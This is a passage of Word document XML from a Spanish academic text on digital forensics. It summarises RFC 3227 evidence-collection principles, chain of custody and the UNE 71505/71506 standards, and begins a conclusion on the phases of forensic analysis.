        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3227. Este documento publicado por la </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Internet Engineering Task Force (IETF)</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Internet Engineering Task Force (IETF): Organización que desarrolla y promueve estándares voluntarios para Internet."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> recoge directrices para recopilar y almacenar evidencias sin ponerlas en riesgo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B952F8" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="00D16863" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En cuanto a los principios para la recolección de evidencias destacan básicamente tres, el orden de volatilidad de los datos, las acciones que deben evitarse y las consideraciones sobre la privacidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432BA05" w14:textId="57AE7120" w:rsidR="006F21A3" w:rsidRPr="00D16863" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sobre el procedimiento de almacenamiento tiene en cuenta la cadena de custodia</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Cadena de custodia: Proceso documentado que rastrea la manipulación de evidencia, como datos digitales, desde su recolección hasta su presentación en un tribunal."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las pruebas recogidas anteriormente y dónde y cómo se deben almacenar estas para que estén a buen recaudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527096A" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para acabar detalla qué tipo de herramientas son las más útiles y qué características deben tener para evitar conflictos, haciendo hincapié en que las herramientas </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deben alterar lo menos posible el escenario. Según este documento el kit de análisis debe incluir las siguientes herramientas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72716C" w14:textId="20BE241E" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Programas para listar y examinar procesos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47761014" w14:textId="53B1482E" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Programas para examinar el estado del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753B2EC" w14:textId="22AB2D77" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Programas para realizar copias bit a bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A71C1" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Todas estas recomendaciones tienen como epicentro el principio de intercambio de Locard, que señala que: "siempre que dos objetos entran en contacto transfieren parte del material que incorporan al otro objeto".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F75893" w14:textId="00E14AAD" w:rsidR="00D504A6" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:t>Normas UNE 71505 y UNE 71506.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746FDC7" w14:textId="07B98EF6" w:rsidR="000348FB" w:rsidRPr="000348FB" w:rsidRDefault="00DE5C26" w:rsidP="00DE5C26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155731918 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia VII.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155732780 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia VIII.</w:t>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000348FB" w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1281A" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Las normas UNE son normas técnicas desarrolladas por el organismo español de normalización, la Asociación Española de Normalización (UNE). "UNE" es el acrónimo de "Una Norma Española". Estas normas establecen especificaciones técnicas, criterios y directrices que deben seguirse en la fabricación, diseño, instalación, uso o mantenimiento de productos, sistemas o servicios en España.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E7F82" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estas normas que tratamos en el presente trabajo tienen como finalidad dar una metodología para la preservación, adquisición, documentación, análisis y presentación de pruebas digitales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6691F" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Según la asociación esta norma debe dar respuesta a las infracciones legales e incidentes informáticos en las distintas empresas y entidades. Con la obtención de dichas pruebas digitales, que serán más robustas y fiables siguiendo la normativa, se podrá discernir si su causa tiene como origen un carácter intencional o negligente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C736612" w14:textId="104A68F6" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Estas normativas </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>se aplican</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a cualquier organización con independencia de su actividad o tamaño, así como a cualquier profesional competente en este ámbito. Se dirige especialmente a incidentes y seguridad, así como al personal técnico que trabaje en laboratorios o entornos de análisis forense de evidencias electrónicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6891CF19" w14:textId="2609F805" w:rsidR="00D504A6" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Se dispone de una copia de la norma UNE 71505 en el siguiente repositorio de la referencia que a continuación se detalla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B0E6A" w14:textId="40876677" w:rsidR="00D504A6" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:t>Conclusiones relativo a las metodologías.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77ECDB" w14:textId="63113791" w:rsidR="000348FB" w:rsidRPr="000348FB" w:rsidRDefault="000348FB" w:rsidP="000348FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155732840 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia IX.</w:t>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155732961 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia X.</w:t>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B5E749" w14:textId="7C42CA60" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tras analizar los distintos apartados de esta sección y otras fuentes que se indicarán al final de la sección, se puede llegar a la conclusión de que el análisis forense informático recoge de la misma manera la metodología forense per se, siguiendo la siguiente estructura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0E513" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aunque no existe una metodología que sea única y universal en el análisis forense, a tenor de la documentación consultada y tomando en consideración la normativa legal y los estándares vigentes a nivel internacional, sí que se puede decir que existen una serie de fases o puntos importantes que se tienen que tomar en consideración para que el análisis forense sea adecuado y sirva como elemento probatorio ante un incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4686AA" w14:textId="0842311E" w:rsidR="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Todas estas recomendaciones, recogidas en distintas documentaciones (ver bibliografía), establecen una estructura lógica que permiten garantizar el proceso y que, en el ámbito civil, se compone básicamente de las siguientes fases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A91634" w14:textId="5673CEEA" w:rsidR="006F21A3" w:rsidRDefault="00062086" w:rsidP="00562105">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251596800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EB375A7" wp14:editId="2C87175E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>120015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2886075" cy="1702435"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="237146938" name="Imagen 2"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46938" name="Imagen 2" descr="Diagrama"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2886075" cy="1702435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4F5AB" w14:textId="48624C8E" w:rsidR="00562105" w:rsidRDefault="007B14FB" w:rsidP="00562105">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1179FC3A" wp14:editId="736BEC13">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>3087094</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>391795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2520315" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1624165046" name="Cuadro de texto 1"/>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0FA0A2A3" w14:textId="1BBD9D68" w:rsidR="00562105" w:rsidRPr="00227383" w:rsidRDefault="00562105" w:rsidP="00562105">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00117A4E">
                              <w:rPr>
                                <w:noProof/>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:t>1</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:bookmarkStart w:id="7" w:name="_Toc155782568"/>
                            <w:r w:rsidR="00227383">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:t>F</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00562105">
                              <w:rPr>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:t>ases de la metodología del análisis forense.</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179FC3A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
